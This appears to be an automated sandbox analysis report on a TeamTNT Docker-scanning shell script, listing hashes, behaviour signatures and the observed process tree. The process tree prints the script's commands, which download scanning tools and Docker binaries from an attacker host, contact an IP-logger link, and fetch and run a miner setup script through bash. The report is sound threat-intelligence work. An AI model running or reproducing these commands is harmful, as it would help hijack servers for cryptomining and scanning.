Analysis
-
max time kernel
23s -
max time network
87s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
-
submitted
29-12-2024 23:10
General
-
Target
SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh
-
Size
21KB
-
MD5
d0295e4ffb268b65f19e7e315f6ec5c6
-
SHA1
0164ad6ed68acd956395202fe8fd6561fe10e62c
-
SHA256
0dab485f5eacbbaa62c2dd5385a67becf2c352f2ebedd2b5184ab4fba89d8f19
-
SHA512
5795640f96e8f5514cce674e46fc2cac5c9d91c53ec7bc45e42ecb315a13851aabd83a9ed11702d7112179ea74f2f6b27febc77204aa6937409e873ec920b33a
-
SSDEEP
192:9Uml6l+q7osa5zmPXArSKUpVkzzfbmpWMzAH53p1RMFKodJZIYIHAFDMXT:mtHssOTmpWCAHvCdYHAFDkT
Malware Config
Signatures
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Reads CPU attributes 1 TTPs 3 IoCs
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh"1⤵
- Writes file to tmp directory
-
/bin/mkdirmkdir -p /etc/.../.docker-api.ip.range.lock/2⤵
-
-
/usr/bin/pkillpkill masscan2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill pnscan2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill zgrab2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../jq/x86_64 -o /usr/bin/jq2⤵
- Reads runtime system information
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../masscan/x86_64 -o /usr/bin/masscan2⤵
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../zgrab/x86_64 -o /usr/bin/zgrab2⤵
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../pnscan/x86_64 -o /usr/bin/pnscan2⤵
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../docker/x86_64.tgz -o /dev/shm/docker.tgz2⤵
-
-
/bin/tartar xzvf /dev/shm/docker.tgz -C /dev/shm/2⤵
-
-
/bin/mvmv "/dev/shm/docker/*" /usr/bin/2⤵
-
-
/bin/rmrm -fr /dev/shm/docker/2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/usr/bin/curlcurl -sLk https://iplogger.org/1A4Cu7 -o /dev/null2⤵
- Reads runtime system information
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -sLk ipv4.icanhazip.com2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -Lk http://chimaera.cc/sh/setup/my.xmr.sh2⤵
- Reads runtime system information
-
-
/bin/bashbash2⤵
-
-
/bin/mkdirmkdir -p /.../2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
81B
MD51eacaff4a80ee2cd21304054a0f1ba5b
SHA1409d8527d082431cd19eff3c86c2821a28917043
SHA2561a2a7a0098ee47a38d4ab34c13a789730b9e44dc8ff5e9984d5ddd518b94ed53
SHA512135135c14c66572cf2a1e2d19088216806c73ba46b54e9e78576613fe73a668c04e922636df7a0770241dec17dde55160bbbb4a3e00d9b5e991a2616f712d21d